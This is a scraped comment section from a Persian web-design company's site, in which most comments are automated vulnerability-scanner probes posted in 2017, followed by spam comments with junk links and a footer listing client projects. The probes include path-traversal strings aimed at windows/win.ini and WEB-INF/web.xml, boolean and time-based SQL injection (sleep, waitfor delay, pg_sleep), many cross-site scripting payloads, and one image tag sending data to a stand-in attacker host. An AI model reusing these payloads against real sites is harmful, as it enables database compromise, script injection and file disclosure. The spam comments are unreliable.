../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۳نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۳نوشت:

1

-1' OR 3+922-922-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۳نوشت:

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۴نوشت:

1

sample%40email.tst<ScRiPt >prompt(925475)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۴نوشت:

1

sample@email.tst<script>prompt(944526)</script> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۵نوشت:

1

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\ در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۵نوشت:

1

-1' OR 3*2<(0+5+922-922) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۵نوشت:

1

sample@email.tst<ScR<ScRiPt>IpT>prompt(925347)</sCr<ScRiPt>IpT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۶نوشت:

1

WEB-INF/web.xml? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۶نوشت:

1

-1' OR 3*2>(0+5+922-922) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۷نوشت:

1

sample%40email.tst<ScRiPt >prompt(900052)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۷نوشت:

1

WEB-INF\\web.xml? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۷نوشت:

1

-1" OR 2+832-832-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۸نوشت:

1

sample%40email.tst<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955729></ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۸نوشت:

1

sample%40email.tst<\0ScRiPt >prompt(923718)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۹نوشت:

1

-1" OR 3+832-832-1=0+0+0+1 -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۹نوشت:

1

sample%40email.tst<video><source onerror="javascript:prompt(955779)"> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۳۹نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۰نوشت:

1

-1" OR 3*2<(0+5+832-832) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۰نوشت:

1

sample%2540email.tst%3Csvg%20onload%3Dprompt(994249)%3E در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۱نوشت:

1

sample%40email.tst<div style=width:expression(prompt(968520))> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۲نوشت:

1

-1" OR 3*2>(0+5+832-832) -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۲نوشت:

1

sample%40email.tst<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXR در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۳نوشت:

1

sample%40email.tst<body onload=prompt(956795)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۴نوشت:

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()= در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۴نوشت:

1

sample%40email.tst<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922342)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۵نوشت:

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0 در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۵نوشت:

1

sample%40email.tst<img src=xyz OnErRor=prompt(977629)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۵نوشت:

1

sample%40email.tst<img/src=">" onerror=alert(985143)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۶نوشت:

1

1 waitfor delay '0:0:9' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۶نوشت:

1

sample%2540email.tst<ScRiPt%20>prompt(927745)</sCripT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۷نوشت:

1

p0BtcvbV'; waitfor delay '0:0:6' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۷نوشت:

1

sample%40email.tst<ScRiPt>prompt(953153)</sCripT> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۷نوشت:

1

L0vkxdXx'); waitfor delay '0:0:6' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۸نوشت:

1

در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۸نوشت:

1

vdXVWLVx')); waitfor delay '0:0:9' -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۸نوشت:

1

sample%40email.tst<input autofocus onfocus=prompt(985489)> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۹نوشت:

1

bLHkHuKb';select pg_sleep(9); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۹نوشت:

1

<a HrEF=http://www.vulnweb.com></a> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۴۹نوشت:

1

eiNtT32b');select pg_sleep(3); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۰نوشت:

1

<a HrEF=jaVaScRiPT:> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۰نوشت:

1

qFXqmFta'));select pg_sleep(6); -- در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۰نوشت:

1

[url=http://www.vulnweb.com][/url] در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۱نوشت:

1

sample%40email.tst<img<!-- --> src=x onerror=alert(900195);//><!-- --> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۲نوشت:

1

sample%40email.tst}body{acu:Expre/**/SSion(prompt(934291))} در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۲نوشت:

1

sample%40email.tst_HFj9o <ScRiPt >prompt(999423)</ScRiPt> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۳نوشت:

1

sample%40email.tst<ifRAme sRc=988408.com></IfRamE> در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۴نوشت:

1

sample%40email.tst<img sRc='http://attacker-979841/log.php? در تاریخ: ۲۵ اسفند ۱۳۹۵ _ ۱۱:۳۵:۵۴نوشت:

1

Darold در تاریخ: ۲۴ اردیبهشت ۱۳۹۶ _ ۲۲:۲۵:۴۳نوشت:

I don't know who you wrote this for but you helped a brotehr out.

Gracye در تاریخ: ۲۵ اردیبهشت ۱۳۹۶ _ ۰۹:۵۵:۳۵نوشت:

Please teach the rest of these internet <a href="http://fvqfzco.com">hooglians</a> how to write and research!

Lily در تاریخ: ۲۸ اردیبهشت ۱۳۹۶ _ ۰۳:۵۵:۵۴نوشت:

Please keep <a href="http://ujyfkyxnrvt.com">thrwoing</a> these posts up they help tons.

Navid در تاریخ: ۳۰ اردیبهشت ۱۳۹۶ _ ۰۳:۲۲:۴۳نوشت:

Peefcrt answer! That really gets to the heart of it! http://lxjklkd.com [url=http://huxdzvxiru.com]huxdzvxiru[/url] [link=http://rszcyeicydl.com]rszcyeicydl[/link]

آخرین شرکتهای طرف قرارداد

دارولند

طراحی فروشگاه اینترنتی

آف مکس

طراحی سایت تخفیف گروهی

نمایندگان بیمه ما

طراحی وب سایت و پورتال نمایندگان

پژند الکترونیک

طراحی وب سایت و پرتال

نمایندگی بوش

طراحی وب سایت شرکتی

ایران بزرگ

طراحی وب سایت، اتوماسیون اداری و خدمات شبکه پایگاه خبری ایران بزرگ

ستون فقرات تهران

طراحی پورتال تخصصی پزشکی ستون فقرات تهران

آخرین توییت ها

آخرین مقالات آموزشی

استفاده از تکنولوژی روز دنیا در شرکت فناوران راتا رایان